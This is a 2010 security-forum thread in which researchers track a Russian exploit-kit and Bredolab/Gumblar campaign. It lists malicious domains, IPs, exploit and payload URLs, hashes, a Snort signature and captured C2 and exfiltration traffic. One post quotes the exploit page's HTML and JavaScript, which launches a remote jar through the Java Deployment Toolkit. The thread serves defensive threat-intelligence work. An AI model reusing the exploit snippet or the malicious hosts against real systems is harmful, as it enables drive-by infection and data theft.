Malware Domain List
Malware Related => Malicious Domains => Topic started by: eoin.miller on May 17, 2010, 07:21:35 pm
-
Found a few exploit kits that are all ending in .ru and running on port 8080/TCP.
188.165.61.44 - relaxedgrape.ru - 8080/TCP
Entry:
http://relaxedgrape.ru:8080/google.com/download.com/sanspo.com.php
PDF:
http://relaxedgrape.ru:8080/Notes1.pdf
http://wepawet.iseclab.org/view.php?hash=818c879f5b8bf09642cee47394ef28a4&type=js
Java:
http://relaxedgrape.ru:8080/Applet1.html
188.165.192.22 - cornerrat.ru, rarephone.ru - 8080/TCP
Entry:
http://rarephone.ru:8080/index.php?pid=7
PDF:
http://rarephone.ru:8080/Notes7.pdf
Java:
http://rarephone.ru:8080/Applet7.html
Malware/Payload:
http://cornerrat.ru:8080/welcome.php?id=6&pid=1&hello=503
174.137.179.244 - globaljoke.ru, gothguilt.ru - 8080/TCP
Malware/Payload:
http://globaljoke.ru:8080/welcome.php?id=6&pid=1&hello=503
-
188.165.192.22 - fewrocker.ru
Java:
http://fewrocker.ru:8080/Applet2.html
-
188.165.192.22 - fewrocker.ru
200 http://fewrocker.ru:8080/
403 http://fewrocker.ru:8080/i/
403 http://fewrocker.ru:8080/22/
200 http://fewrocker.ru:8080/cache/
403 http://fewrocker.ru:8080/cgi-bin/
403 http://fewrocker.ru:8080/images/
200 http://fewrocker.ru:8080/new/
200 http://fewrocker.ru:8080/22/build.exe (MD5: 39ed2b2e25883aa21ae1dde13adf7d99)
403 http://fewrocker.ru:8080/22/33/
302 http://fewrocker.ru:8080/22/cgi-bin/
302 http://fewrocker.ru:8080/22/33/cgi-bin/
200 http://fewrocker.ru:8080/new/index.php
403 http://fewrocker.ru:8080/new/include/
200 http://fewrocker.ru:8080/new/install/
403 http://fewrocker.ru:8080/new/logs/
200 http://fewrocker.ru:8080/new/install/index.php
-
Couple more, I'll keep updating the thread as I find stuff:
greatfile.ru - 85.17.19.26
valuablemind.ru - 94.75.243.6
-
Bredolab I take it phillipp?
BM Tx Edition
Src:http://fewrocker.ru:8080/new/
-
Bredolab I take it phillipp?
BM Tx Edition
Src:http://fewrocker.ru:8080/new/
BManager C&C Panel
Dont know if there is a connection to Bredolab though. Im not up-to-date at all :D
-
as far as i know BM is bredolab
-
as far as i know BM is bredolab
I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.
http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc
-
as far as i know BM is bredolab
I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.
http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc
yeah, noticed that too.
could be a none connected file, or even a file downloaded by bredolab
-
I see the binary posting data to
http://morechord.ru/home.phpVWlkMDo6MjlERDA0QTZ+fjI5REQwNEE2YGAyOUREMDRBNg0K
which looks like base64 encoded.
# morechord.ru
Domain: morechord.ru
Reg: bushy@bigmailbox.ru
IP: 217.23.7.112
RDNS:
ASN: 49981 (NL)
IP: 217.20.47.85
RDNS:
ASN: 15830 (GB)
IP: 217.11.254.41
RDNS: assigned-217-11-254-041.casablanca.cz
ASN: 15685 (CZ)
IP: 88.191.47.83
RDNS: sd-7664.dedibox.fr
ASN: 12322 (FR)
IP: 217.148.89.77
RDNS:
ASN: 16237 (NL)
-
as far as i know BM is bredolab
I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.
http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc
What lead me to this nest of badness was a signature that fired for bredolab from that host. One from the VRT/Sourcefire guys the other from EmergingThreats.net both fired on a packet from this client system.
Request:
GET /new/controller.php?action=bot&entity_list=&first=1&rnd=981633&uid=1&guid=2678185660
HTTP/1.1
Host: bayjail.ru
Signature:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPECIFIC-THREATS Bredolab downloader communication with server attempt"; flow:to_server,established; uricontent:"action="; nocase; uricontent:"entity"; nocase; uricontent:"rnd="; nocase; uricontent:"uid="; nocase; uricontent:"guid="; nocase; pcre:"/uid\x3D\d/Usmi"; pcre:"/guid\x3D\d/Usmi"; pcre:"/rnd\x3D\d/smiU"; metadata:policy balanced-ips drop, policy security-ips drop; reference:url,www.threatexpert.com/report.aspx?md5=b5a530185d35ea8305d3742e2ee5669f; classtype:trojan-activity; sid:16144; rev:2;)
I looked into what else the infected client system was connected to and then looked around for more *.ru domains that people were talking to over 8080/TCP.
EDIT:
I thought bayjail.ru was already on the MDL, I guess it isn't and should be added.
#nslookup bayjail.ru
Non-authoritative answer:
Name: bayjail.ru
Addresses: 88.191.47.83
217.11.254.41
217.20.47.85
217.23.7.112
217.148.89.77
-
which looks like base64 encoded.
Noticed this too. Decoded string looks like an id.
Uid0::29DD04A6~~29DD04A6``29DD04A6
-
Seen other infected hosts POSTing to foresaleonline.ru
#nslookup foresaleonline.ru
Non-authoritative answer:
Name: foresaleonline.ru
Addresses: 217.11.254.41
217.20.47.85
217.148.89.77
62.84.155.246
88.191.47.83
The POST:
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"
VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K
------------XXXXXXXXXXXXXXXXXXXXXX--
-
Seen other infected hosts POSTing to foresaleonline.ru
#nslookup foresaleonline.ru
Server: krusty.eid.doi.gov
Address: 10.10.2.3
Non-authoritative answer:
Name: foresaleonline.ru
Addresses: 217.11.254.41
217.20.47.85
217.148.89.77
62.84.155.246
88.191.47.83
The POST:
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"
VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K
------------XXXXXXXXXXXXXXXXXXXXXX--
looks like an ftp stealer
-
I'm not sure if these domains are on the mdl, but I've seen hits on identical activity out of these domains with the associated dates if this helps the cause:
flowdisappear.ru / 82.211.7.32 (4/29)
passportblues.ru / 62.67.246.113 (5/5 + 5/12)
gigafleet.ru / 62.193.208.175 (5/6)
gothguilt.ru / 93.89.80.117 (5/13)
??? / 85.17.137.40 (5/15) # didn't capture the URL in this request, but fits the profile.
valuablemind.ru / 85.17.19.26 (5/17)
All of the requests are similar:
<html><head><title>Bob's Homepage</title></head><body><applet width='100%' height='100%' code='iPhoneBook' archive='Games.jar'><param name='site' VALUE='Njg3NDc0NzAzQTJGMkY2NzZGNzQ2ODY3NzU2OTZDNzQyRTcyNzUzQTM4MzAzODMwMkY3NzY1NkM2MzZGNkQ2NTJFNzA2ODcwM0Y2OTY0M0QzMTMxMjY3MDY5NjQzRDMxMjYzMTNEMzEyNjY0'></applet><applet code='sunny.Changes.class' archive='NewGames.jar' width='254' height='186'><param name='data' VALUE='http://gothguilt.ru:8080/welcome.php?id=9&pid=1&1=1'><param name='cc' value='1'></applet><script>
var u = "http: -J-jar -J\\\\78.26.127.127\\public\\001.jar none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch(u);
} else {
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
-
www.malc0de.com posted on Twitter a list of domains being used for that campaign.
1kinomall.ru
abr.zeytincilik.info
allturtle.ru
ashdog.ru
ashsoftware.ru
badmap.ru
bakedonion.ru
bayjail.ru
belowwatch.ru
bestfindaloan.cn
bestfinderr.cn
bigpremiumfind.cn
bigskytopguide.cn
bigtopfindsite.cn
blindbolt.ru
blueflame.ru
boldrace.ru
brilliantdad.ru
bunchguide.cn
busycloth.ru
casinoslotgamble.cn
celticradar.ru
center-kino.ru
cheap-drugshop.com
cheapfad.ru
cheapriot.ru
chokelabel.ru
clearquake.ru
combinebet.cn
cooltrack.ru
cornerrat.ru
creativeblockplay.cn
crushhead.ru
cutechair.ru
cutetrack.ru
dailyboss.ru
dating-4you.ru
dating-group.ru
dating-spot.ru
dieta-24.ru
dieta-optimal.ru
dieta-sexy.ru
dieta-tvoya.ru
dirtybody.ru
dirtysin.ru
dirtyzero.ru
dizzypizza.ru
drownpark.ru
drug-onlinestore.com
drugs-prostore.com
drugstore-menu.com
dullspa.ru
eastwombat.ru
easy-buydrugs.com
easydrugsbuy.com
energeticguy.ru
enter-pharmacyshop.com
evilpal.ru
fablips.ru
fardream.ru
fast-kino.ru
fewrocker.ru
fifthiron.ru
findbigmoneygame.cn
findbigshots.cn
findbigsoftpack.cn
findbigthinkers.cn
findyourbigidea.cn
firmwriter.ru
flowlaugh.ru
foresaleonline.ru
foundsmoke.ru
funnylead.ru
furryentry.ru
furrypipe.ru
futurevideo.ru
getdrugs-store.com
giantpremium.cn
gianttopdiscover.cn
gianttoplocate.cn
gigafleet.ru
globaljoke.ru
goodpool.ru
gothguilt.ru
greatfile.ru
gripgrate.ru
hadcorn.ru
harshdye.ru
healthy-dieta.ru
heavycloud.ru
help-vizov.ru
herpark.ru
hochutebia.ru
hostdnssite.com
hostindianet.com
hotgas.ru
hotsex-meets.ru
hugetoplocate.cn
hugetopseek.cn
icebus.ru
illmap.ru
indypages.ru
innerduck.ru
insidecan.ru
internet-drugmenu.com
ironstar.ru
juicyfile.ru
kindsunday.ru
kino-mall.ru
kino-shops.ru
labelstare.ru
lameflash.ru
lastspider.ru
latevenom.ru
lazyloss.ru
lazyrow.ru
leakymaid.ru
lessjazz.ru
lightword.ru
litetopfindworld.cn
litwire.ru
lkgjhjbh.balkansport.info
longcloud.ru
lostdeed.ru
lotbetsite.cn
lotwageronline.cn
lovemine.ru
love-pair.ru
lunchscone.ru
macroarea.ru
magic-dieta.ru
mediahousenamebuypicture.cn
megahotgirls.ru
megawomen.ru
menu-pharmacyshop.com
michaelsbestway2findalawyer.cn
micmarket.ru
microdoor.ru
mildroom.ru
miniarms.ru
ministate.ru
missgin.ru
mixbetonline.cn
mixbetworld.cn
mixwager.cn
modelprod.ru
mondaybubble.ru
mondayring.ru
morechord.ru
mushylion.ru
nearzit.ru
needtempt.ru
netwebinternet.ru
newnetnameshop.cn
noknack.ru
nosypipe.ru
nothill.ru
notkey.ru
ns1.bestservicehost.com
nudechicks.ru
oddbabe.ru
odnoklassniki-nochiu.ru
odnoklassnikinochiu.ru
oldpresident.ru
onebeard.ru
onelead.ru
onewinter.ru
online-drugshop.com
online-drugsstore.com
ourdope.ru
ourriver.ru
pangreed.ru
parkinglotbet.cn
passportblues.ru
pearlpole.ru
petlips.ru
petquestion.ru
petsample.ru
petwife.ru
pillsmartshop.com
pinkhack.ru
playslotbet.cn
politicalpoets.ru
powerbarrel.ru
powermixplay.cn
premiumlocate.cn
prickheal.ru
priorface.ru
priorsmell.ru
q0c.ru
q0l.ru
q0x.in
q0x.ru
q1f.ru
q1n.ru
q1x.ru
q3e.ru
q5x.ru
radicalgirl.ru
radjoker.ru
radtune.ru
rareelf.ru
rarephone.ru
rattyduck.ru
rawshower.ru
redspinster.ru
redwriter.ru
relaxedgrape.ru
richsign.ru
romantube.ru
roundgain.ru
roundhour.ru
roundmaker.ru
roundpad.ru
roundroad.ru
rubybrush.ru
rudeair.ru
ruralmist.ru
saltyriver.ru
saltysky.ru
scaryloss.ru
sdfasdf.vangangelt.info
secretaxe.ru
sex-army.ru
shinyrock.ru
shopmovielife.cn
shortfeet.ru
siliconemist.ru
sixthrush.ru
skepticalpub.ru
sleepydream.ru
slickfilm.ru
smallbars.ru
softstage.ru
soggyzero.ru
soreentry.ru
sos-vizov.ru
soundrisk.ru
southernpeg.ru
sparechief.ru
sparemat.ru
special-call.ru
special-message.ru
spellload.ru
spicygirls.ru
spicyledge.ru
spicyyear.ru
spotsnow.ru
springarctic.ru
srochniy-zvonok.ru
stallshare.ru
stellarshower.ru
store-drugs4u.com
stuckdate.ru
stuffstep.ru
suavepad.ru
subroyalty.ru
sunnycurse.ru
superbetsports.cn
surechip.ru
tallpen.ru
tameconcert.ru
tangystar.ru
tapclip.ru
tartshow.ru
tastysea.ru
telechart.ru
tenderavatar.ru
tenthprofit.ru
terminalpoem.ru
thebestwaytofind.cn
thecutpricegroup.cn
themixbet.cn
tightspace.ru
torncurrent.ru
tornmum.ru
ultimatecomfort.ru
urbandream.ru
usetune.ru
validbanner.ru
validfolk.ru
valuablemind.ru
vastdiary.ru
vastinsect.ru
vastobject.ru
vasttune.ru
videoroyal.ru
wantdive.ru
weakimage.ru
wearyyear.ru
westcountry.ru
westlips.ru
wetfunction.ru
wetgeek.ru
wooddemand.ru
worstfuel.ru
wovenplane.ru
wovenshelf.ru
xochu-dating.ru
yourbettas.cn
yourcombine.cn
yourmoose.ru
yoursoap.ru
yummygirls.ru
zdorovaya-diet.ru
zipbin.ru
zvonok-sos.ru
zvonok-spasatel.ru
-
it's Gumblar ;) en.wikipedia.org/wiki/Gumblar
Got them last week already, injected obfuscated script in glype proxy
gothguilt.ru.
78.32.1.70
88.165.95.133
88.165.124.185
12.19.216.11
4.23.92.35
linezing.com
19.42.227.248
jsunpack.jeek.org/dec/go?report=5b719b16905d80a41829f672915c2c56ad9aefb5
jsunpack.jeek.org/dec/go?report=c918247e34f214e96704398b6883d840fcff2473
jsunpack.jeek.org/dec/go?report=2255ccef47b208679bb47f1809127108e7c3bbd7
gothguilt.ru:8080/hsbc-co-uk/google.com/linezing.com.php
gothguilt.ru:8080/aol-co-uk/google.com/yahoo.com.cn.php
-
listed by malc0de.
http://malc0de.com/database/index.php?search=.ru%3A8080